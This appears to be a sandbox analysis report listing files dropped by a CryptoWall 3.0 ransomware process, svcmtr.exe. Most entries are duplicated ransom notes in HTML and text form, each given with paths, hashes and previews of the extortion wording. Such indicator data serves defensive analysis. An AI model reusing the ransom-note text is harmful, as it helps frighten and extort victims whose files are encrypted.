                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin9728060290\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tracking Protection\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tracking Protection\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\UrlBlockManager\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\UrlBlockManager\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\VersionManager\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\VersionManager\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\brndlog.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):6382
                                                                                                                          Entropy (8bit):7.953972400342168
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:GovLnUcws4sQ6en3CI1tMbOMGTa6Hp4JlD5y:GIArsQ6en4L6J4JLy
                                                                                                                          MD5:456A66D829191A53BD1BEC55D81A9F13
                                                                                                                          SHA1:65EE4ABE7E0A5C7C1B65E133FE00C3B4880DAAF3
                                                                                                                          SHA-256:DCDA40FA7D4B242D82A4B18DA79B3E1B65536C6E812A3287AA64E56CF258456C
                                                                                                                          SHA-512:C02DFF14077B86EAF9208BC780C70DFF09EA5C7E2489558DC429EF688AED5D48707ECE4CD8F6C2D5AC866F44004AC0EC6DD6F8B83E811177F459BDF330D7B923
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264.....?....?.@x.3..L...ru.U..J...u.q.K..V.C}...9.VjQD..V.S.#......w..~.y.o.......|.J3..c........}...[...l..i.^...9.t.:{.ED)....3`..-A...ut../...7....+..........!V..'.+.Gd..5z}...O.5.Wf....0....F.b.~q|.YOY.7......G...2.......A.....L.....z3Cd'05V.D..4...\[e.5..v..Dz...v....P.L9 .\.2U.......J.yp.....#R.!.G....ys.....>o..a...../.....E....,..mM.~.}.....9.Ml.nA..............j%...*..v.EE8.{..j...M...P..L>t.s...o*....[........k..%b.)>...+.as.....i.oe.&u"...lB0.w...,$..i.S.6x.%..w...8.`WB6J...f.%2c.~..I....j.j.2X?Y0...'G....).....i|..C.)4R.U\Tk1?....dqk6.G.....j.,!*..?.Q.|.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\lr5drzg\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\lr5drzg\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\000064AB\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\000064AB\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\restore_files_gpmus.txt

                                                                                                                          Download File
